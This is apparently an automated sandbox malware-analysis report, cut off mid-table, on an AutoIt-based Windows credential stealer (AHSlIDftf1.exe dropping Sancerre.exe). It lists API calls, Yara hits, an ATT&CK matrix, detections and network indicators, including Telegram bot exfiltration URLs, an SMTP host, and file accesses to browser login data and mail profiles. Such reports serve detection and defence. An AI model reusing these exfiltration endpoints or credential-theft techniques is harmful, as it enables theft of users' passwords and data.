Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Code function: 0_2_00DB1201 LogonUserW, DuplicateTokenEx, CloseHandle, OpenWindowStationW, GetProcessWindowStation, SetProcessWindowStation, OpenDesktopW, _wcslen, LoadUserProfileW, CreateEnvironmentBlock, CreateProcessAsUserW, UnloadUserProfile, GetProcessHeap, HeapFree, CloseWindowStation, CloseDesktop, SetProcessWindowStation, CloseHandle, DestroyEnvironmentBlock, 0_2_00DB1201
Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Code function: 0_2_00D92BA5 SetCurrentDirectoryW, GetForegroundWindow, ShellExecuteW, 0_2_00D92BA5
Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Code function: 0_2_00DBB226 SendInput, keybd_event, 0_2_00DBB226
Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Code function: 0_2_00DD22DA GetForegroundWindow, GetDesktopWindow, GetWindowRect, mouse_event, GetCursorPos, mouse_event, 0_2_00DD22DA
Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\AHSlIDftf1.exe"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\konked\Sancerre.exe "C:\Users\user\AppData\Local\konked\Sancerre.exe"
Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\konked\Sancerre.exe"
Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Code function: 0_2_00DB0B62 GetSecurityDescriptorDacl, GetAclInformation, GetLengthSid, GetLengthSid, GetAce, AddAce, GetLengthSid, GetProcessHeap, HeapAlloc, GetLengthSid, CopySid, AddAce, SetSecurityDescriptorDacl, SetUserObjectSecurity, HeapFree, GetProcessHeap, HeapFree, GetProcessHeap, HeapFree, GetProcessHeap, HeapFree, GetProcessHeap, HeapFree, 0_2_00DB0B62
Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Code function: 0_2_00DB1663 AllocateAndInitializeSid, CheckTokenMembership, FreeSid, 0_2_00DB1663
Source: AHSlIDftf1.exe, Sancerre.exe.0.dr | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: AHSlIDftf1.exe, Sancerre.exe | Binary or memory string: Shell_TrayWnd
Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Code function: 0_2_00D70698 cpuid 0_2_00D70698
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Code function: 0_2_00DC8195 GetLocalTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetCurrentDirectoryW, SetCurrentDirectoryW, SetCurrentDirectoryW, SetCurrentDirectoryW, SetCurrentDirectoryW, SetCurrentDirectoryW, 0_2_00DC8195
Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Code function: 0_2_00DAD27A GetUserNameW, 0_2_00DAD27A
Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Code function: 0_2_00D8BB6F _free, GetTimeZoneInformation, WideCharToMultiByte, WideCharToMultiByte, 0_2_00D8BB6F
Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Code function: 0_2_00D542DE GetVersionExW, GetCurrentProcess, IsWow64Process, LoadLibraryA, GetProcAddress, GetNativeSystemInfo, FreeLibrary, GetSystemInfo, GetSystemInfo, 0_2_00D542DE
Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match | File source: 00000008.00000002.2973433634.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2974305954.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.Sancerre.exe.730000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.Sancerre.exe.1450000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Sancerre.exe.730000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.Sancerre.exe.1450000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Sancerre.exe PID: 5812, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 3328, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Sancerre.exe PID: 3244, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 4048, type: MEMORYSTR
Source: Yara match | File source: 1.2.Sancerre.exe.730000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.Sancerre.exe.1450000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Sancerre.exe.730000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.Sancerre.exe.1450000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Sancerre.exe PID: 5812, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 3328, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Sancerre.exe PID: 3244, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Sancerre.exe | Binary or memory string: WIN_81
Source: Sancerre.exe | Binary or memory string: WIN_XP
Source: Sancerre.exe.0.dr | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: Sancerre.exe | Binary or memory string: WIN_XPe
Source: Sancerre.exe | Binary or memory string: WIN_VISTA
Source: Sancerre.exe | Binary or memory string: WIN_7
Source: Sancerre.exe | Binary or memory string: WIN_8
Source: Yara match | File source: 1.2.Sancerre.exe.730000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.Sancerre.exe.1450000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Sancerre.exe.730000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.Sancerre.exe.1450000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2973433634.000000000308A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Sancerre.exe PID: 5812, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 3328, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Sancerre.exe PID: 3244, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 4048, type: MEMORYSTR

                  Remote Access Functionality

Source: Yara match, File source: 00000008.00000002.2973433634.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.2974305954.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 1.2.Sancerre.exe.730000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.2.Sancerre.exe.1450000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.Sancerre.exe.730000.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.2.Sancerre.exe.1450000.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: Sancerre.exe PID: 5812, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: RegSvcs.exe PID: 3328, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: Sancerre.exe PID: 3244, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: RegSvcs.exe PID: 4048, type: MEMORYSTR
Source: Yara match, File source: 1.2.Sancerre.exe.730000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.2.Sancerre.exe.1450000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.Sancerre.exe.730000.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.2.Sancerre.exe.1450000.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: Sancerre.exe PID: 5812, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: RegSvcs.exe PID: 3328, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: Sancerre.exe PID: 3244, type: MEMORYSTR
Source: C:\Users\user\Desktop\AHSlIDftf1.exe, Code function: 0_2_00DD1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 0_2_00DD1204
Source: C:\Users\user\Desktop\AHSlIDftf1.exe, Code function: 0_2_00DD1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_00DD1806
Source: C:\Users\user\AppData\Local\konked\Sancerre.exe, Code function: 1_2_005F1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 1_2_005F1204
Source: C:\Users\user\AppData\Local\konked\Sancerre.exe, Code function: 1_2_005F1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 1_2_005F1806
MITRE ATT&CK Matrix (digits in front of a technique are the matrix's signature-count badges for that technique)

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | 1 1 1 Scripting | 2 Valid Accounts | 1 Native API | 1 1 1 Scripting | 1 Exploitation for Privilege Escalation | 1 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 2 1 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 4 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | 2 Valid Accounts | 2 Valid Accounts | 3 Obfuscated Files or Information | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 1 1 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | 2 Registry Run Keys / Startup Folder | 2 1 Access Token Manipulation | 1 DLL Side-Loading | NTDS | 1 2 7 System Information Discovery | Distributed Component Object Model | 2 1 Input Capture | 1 Non-Standard Port | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 2 1 2 Process Injection | 1 Masquerading | LSA Secrets | 3 2 1 Security Software Discovery | SSH | 3 Clipboard Data | 3 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 2 Registry Run Keys / Startup Folder | 2 Valid Accounts | Cached Domain Credentials | 1 1 1 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | 2 4 Application Layer Protocol | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 1 1 Virtualization/Sandbox Evasion | DCSync | 2 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 2 1 Access Token Manipulation | Proc Filesystem | 1 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 2 1 2 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
| IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | 1 System Network Configuration Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
Behavior Graph (ID: 1587865, Sample: AHSlIDftf1.exe, Start date: 10/01/2025, Architecture: WINDOWS, Score: 100)

• Contacted network nodes: reallyfreegeoip.org (Tries to detect the country of the analysis system (by using the IP)); api.telegram.org (Uses the Telegram API (likely for C&C communication)); 3 other IPs or domains
• Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 10 other signatures
• AHSlIDftf1.exe (started)
  - Dropped: C:\Users\user\AppData\Local\...\Sancerre.exe, PE32
  - Signatures: Binary is likely a compiled AutoIt script file; Found API chain indicative of sandbox detection
  - Started Sancerre.exe
    - Dropped: C:\Users\user\AppData\...\Sancerre.vbs, data
    - Signatures: Multi AV Scanner detection for dropped file; Binary is likely a compiled AutoIt script file; Machine Learning detection for dropped file; 3 other signatures
    - Started RegSvcs.exe
      - Connects to mail.standartasansor.com (178.210.170.40, ports 49759, 49773, 587; PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTR, Turkey); api.telegram.org (149.154.167.220, ports 443, 49751, 49772; TELEGRAMRU, United Kingdom); 2 other IPs or domains
• wscript.exe (started)
  - Signature: Windows Scripting host queries suspicious COM object (likely to drop second stage)
  - Started Sancerre.exe
    - Signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process
    - Started RegSvcs.exe
      - Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)

Antivirus detection, submitted file:

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| AHSlIDftf1.exe | 70% | Virustotal | | Browse |
| AHSlIDftf1.exe | 74% | ReversingLabs | Win32.Trojan.AutoitInject | |
| AHSlIDftf1.exe | 100% | Joe Sandbox ML | | |

Antivirus detection, dropped files:

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| C:\Users\user\AppData\Local\konked\Sancerre.exe | 100% | Joe Sandbox ML | | |
| C:\Users\user\AppData\Local\konked\Sancerre.exe | 74% | ReversingLabs | Win32.Trojan.AutoitInject | |
                  No Antivirus matches
                  No Antivirus matches
Antivirus detection, URLs:

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| http://mail.standartasansor.com | 0% | Avira URL Cloud | safe | |
| http://51.38.247.67:8081/_send_.php?L | 0% | Avira URL Cloud | safe | |
Domains:

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| reallyfreegeoip.org | 104.21.64.1 | true | false | | high |
| api.telegram.org | 149.154.167.220 | true | false | | high |
| mail.standartasansor.com | 178.210.170.40 | true | true | | unknown |
| checkip.dyndns.com | 193.122.6.168 | true | false | | high |
| checkip.dyndns.org | unknown | unknown | false | | high |
Contacted URLs:

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706%0D%0ADate%20and%20Time:%2011/01/2025%20/%2000:31:36%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20367706%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high |
| https://reallyfreegeoip.org/xml/8.46.123.189 | false | | high |
| https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706%0D%0ADate%20and%20Time:%2011/01/2025%20/%2001:51:01%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20367706%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high |
| http://checkip.dyndns.org/ | false | | high |
URLs from memory and binaries:

| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| https://www.office.com/ | RegSvcs.exe, 00000008.00000002.2973433634.0000000003166000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.000000000308A000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706%0D%0ADate%20a | RegSvcs.exe, 00000002.00000002.2974305954.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000003066000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://api.telegram.org | RegSvcs.exe, 00000002.00000002.2974305954.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000003066000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://api.telegram.org/bot | Sancerre.exe, 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2974305954.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, Sancerre.exe, 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000003066000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://mail.standartasansor.com | RegSvcs.exe, 00000002.00000002.2974305954.0000000002DD3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000003102000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://chrome.google.com/webstore?hl=enH | RegSvcs.exe, 00000002.00000002.2974305954.0000000002E06000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://www.office.com/lB | RegSvcs.exe, 00000002.00000002.2974305954.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000003170000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://www.office.com/H | RegSvcs.exe, 00000002.00000002.2974305954.0000000002E37000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://checkip.dyndns.org | RegSvcs.exe, 00000002.00000002.2974305954.0000000002D10000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000002F81000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | RegSvcs.exe, 00000002.00000002.2979175921.0000000003F21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003D2F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003DA4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003FF7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003ED3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003D7D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2974305954.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.000000000405F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.00000000040AD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.0000000004326000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.0000000004203000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 